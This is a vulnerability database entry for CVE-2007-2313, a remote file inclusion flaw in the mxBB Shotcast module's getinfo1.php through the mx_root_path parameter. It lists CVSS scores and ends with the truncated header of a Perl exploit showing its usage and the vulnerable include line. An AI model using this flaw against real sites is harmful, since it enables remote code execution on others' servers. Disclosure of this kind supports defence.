7.5
CVSSv2

CVE-2007-2313

Published: 26/04/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in getinfo1.php in the Shotcast 1.0 RC2 module for mxBB allows remote malicious users to execute arbitrary PHP code via a URL in the mx_root_path parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

mxbb mx shotcast 1.0_rc2

Exploits

#!/usr/bin/perl # #mxBB Module MX Shotcast 10 RC2 (getinfo1php) Remote File Include Exploit # #Coded by bd0rk || SOH-Crew # #Usage: exploitpl [target] [cmd shell] [shell variable] # #Greetings: str0ke, TheJT, DarkFig # #Vulnerable Code: include_once($mx_root_path 'common'$phpEx); # #Vendor: wwwmx-systemcom/modules/mx_pafiledb/dload ...